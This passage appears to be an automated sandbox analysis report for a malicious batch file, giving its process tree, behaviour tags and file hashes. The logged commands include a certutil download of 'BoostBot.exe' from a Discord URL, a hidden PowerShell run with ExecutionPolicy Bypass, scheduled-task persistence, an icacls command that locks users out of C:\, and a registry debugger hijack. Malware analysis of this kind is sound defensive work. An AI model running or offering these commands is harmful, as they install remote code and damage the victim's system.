- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:1424 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3520
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1212
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1236
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1428
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1552
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1564
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1748
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1784
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1860
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2004
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2016
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1420
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1808
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2148
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2212
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2800
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2828
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2876
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3020
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3468
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
PID:3548 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fix.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\system32\certutil.execertutil -urlcache -split -f "https://cdn.discordapp.com/attachments/1237881664131174481/1239282786335064204/BoostBot.exe?ex=66425b89&is=66410a09&hm=76121e524db94e51397af0fa52812c443a6cb5a194da52bb2909deb394f90aee&" BoostBot.exe3⤵PID:3856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Process -FilePath 'BoostBot.exe' -Verb RunAs"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Users\Admin\AppData\Local\Temp\BoostBot.exe"C:\Users\Admin\AppData\Local\Temp\BoostBot.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe" /rl HIGHEST /f5⤵
- Creates scheduled task(s)
PID:2712 -
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
PID:1660 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"6⤵
- Executes dropped EXE
PID:100 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /delete /tn "$sxr-powershell" /f6⤵PID:4940
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RezYbX3vRPUc.bat" "6⤵PID:5016
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:3204
-
C:\Windows\SysWOW64\chcp.comchcp 650017⤵PID:4212
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost7⤵
- Runs ping.exe
PID:4644 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"6⤵
- Loads dropped DLL
PID:2888 -
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77$sxr-powershell.exe" /tr "'C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe'" /sc onlogon /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:3964 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"5⤵
- Executes dropped EXE
PID:4944 -
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77BoostBot.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\BoostBot.exe'" /sc onlogon /rl HIGHEST5⤵
- Creates scheduled task(s)
PID:4792 -
C:\Windows\system32\icacls.exeicacls "C:\" /deny *S-1-1-0:(OI)(CI)F /T3⤵
- Modifies file permissions
PID:2888 -
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Executable File Execution Options\cmd.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f3⤵PID:1996
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\Fix.bat"3⤵
- Views/modifies file attributes
PID:2636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3644
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3860
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:4024
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4108
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4500
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3872
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:2144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:1048
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
PID:1924
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:1496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:900
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3448
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2648
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:748
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:1580
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize338B
MD5644edf29269e86529e8e0870510c5678
SHA195de5f9adc0a1c42335f4ed77086c7f026fb7c23
SHA25649ac3e3ced921de8c44fd193f9ea409ee3d16f760df36d933ac66c6ca65681a5
SHA512f67961d2cc138838c815acdd56fa67fea32580857020390ccbf60b7c7bfbb66c8f4d1160541ff3b4a30669fa70c4c66ba9dc31de5e7e2da43a52d1bfc925655a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5E5B0733CDA24F9EF7038FEEB6987C6E
Filesize556B
MD53636990eb953c6123a558e67542f1bb8
SHA142564285fe8ea304ecd4d3b9c72cfb7192074028
SHA256b7729c39f5eb4fa39065c3c43c0ecbcd8da2dfe2ea5f4b48f3107c3b7acac983
SHA512ae9dc383a14ffc0003b560fff33c8ee313f5fb723b6a6d91d5f151bd3994f1df3b6ac82db83308cefa17ee7bc7618a997dc02c848bc52157e8742ef49d842f3d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Filesize408B
MD5c52c2214399f0029af65c3bc80a56cab
SHA12c0c3be6315de15bdf8dfeab11e4af0e91ec713f
SHA256eccd6198ba66ac3a021dffd91ea42c420d9805cfec713db01f4b2d13edafc7f2
SHA51260f414493c981e1ba0eb22f95d46f6bb2cd3e948cb0348dde6f75dd478608bbc4d0e09979e569a9e492aa07874824ba0152b516c122ecd8a222d44e78b52b5b8
-
Filesize
409KB
MD5404ab800bbe49c36bd64d0d73600b59a
SHA14c8dff2702fada108f7477ad357067310b584366
SHA2565465f02f24ee5c1fc9c9c27c86c209eeddc2ed607143e1b76ca9c9d9b7b84154
SHA512d0ecd88adfd84d9d8e845281e0437368aadf3d1d6fb704d7c7630d1360697471c2a49584f968eeebd5b435f11af9ce3d06327f1835fa5d07a140f22c0f95fc11
-
Filesize
283B
MD5a4194184c2c895f8a5f184e76abe4fae
SHA1540832fb4c6d0169fdf642ccba24d2823fa6b480
SHA25615a96d789b4fa6d8618ce8a7108c4d9dd0066b3168a13f29ecfb625d96c55312
SHA51297d82bda8782da48e3af665f33975de7ae87fd666722842231b88f27ceb2e64ecb40f25bb2f9a61c113d021a2612d74843da10fb953846c206672e584ef796a7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
224B
MD54f651dd522c656e7184fa37ed96984b5
SHA19b5f42eb0958b1ecbcf040844b73af010a0ebab6
SHA2562658f044a34ac931c1a30a3027ae3638ba2cfdac1dac73618b13ccbe64cc62c2
SHA512b4dab234f4543c313ae1b2cd0fa58bee9ac2011e0a3edfba6da5b8150af28ca2bc9afd80cc031b4ef9dd89fffef7d8b58e2a4e9d14421c4549a074c454ef0126
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD536fea3c7bd7bf5f15ee1a748daae1f24
SHA1c5e0122744a61d18b64126bf35374e29ecfe7553
SHA256bec6c6166fb67f7866ad5dad460b9212b3fe6a2f909638ec9abe465c6199ade4
SHA5126ded68570e0234e985f5a58307e25f94e9980de39d306e16ab02d89f67b701c129ac740f48bc7f22a5befe78cbfe56bd76a31a12d17ffc973be1a8a3079de4c1
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5aa187cac09f051e24146ad549a0f08a6
SHA12ef7fae3652bb838766627fa6584a6e3b5e74ff3
SHA2567036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f
SHA512960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2